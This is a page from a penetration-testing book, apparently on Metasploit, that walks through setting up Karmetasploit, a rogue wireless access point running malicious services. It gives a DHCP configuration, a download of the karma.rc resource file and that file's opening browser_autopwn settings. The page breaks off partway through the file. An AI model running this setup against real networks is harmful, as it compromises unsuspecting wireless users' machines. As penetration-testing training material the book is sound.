background image

178

Chapter 12

Karmetasploit is the Metasploit Framework implementation of the 

KARMA attack. It implements various “evil” services including DNS, POP3, 
IMAP4, SMTP, FTP, SMB, and HTTP. These services accept and respond to 
most requests from clients and will serve up all kinds of malicious fun. (The 
various modules are in the 

modules/auxiliary/server

 directory of the Metasploit 

root directory.)

Configuration

Karmetasploit requires very little configuration. To begin, we configure a 
DHCP server to be used to hand out IP addresses to wireless targets. Back|
Track includes a DHCP server, but we will need to create a custom configura-
tion file for it to use with Karmetasploit, as shown in the following listing:

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {

      range 10.0.0.100 10.0.0.254;

        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
}

We back up our original 

dhcpd.conf

 file by entering 

cp /etc/dhcp3/dhcpd.conf/

etc/dhcp3/dhcpd.conf.back

, and then we create a new file containing the data 

shown at  , which will serve addresses in the range of 10.0.0.100 to 10.0.0.254  . 
(If you are unfamiliar with DHCP configurations, don’t worry; as long as your 
new 

dhcpd.conf

 looks similar to this it should work fine.)

Next, we download the KARMA resource file, because as of this writing 

it’s not included in the regular Metasploit trunk:

root@bt:/opt/metasploit3/msf3# 

wget http://www.offensive-security.com/downloads/karma.rc

 

When we open the KARMA resource file 

karma.rc

, we can see the sequence 

of events that occur when it runs, as shown here:

root@bt:/opt/metasploit3/msf3# 

cat karma.rc

db_connect postgres:toor@127.0.0.1/msfbook 

use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1

setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1

set LPORT 45000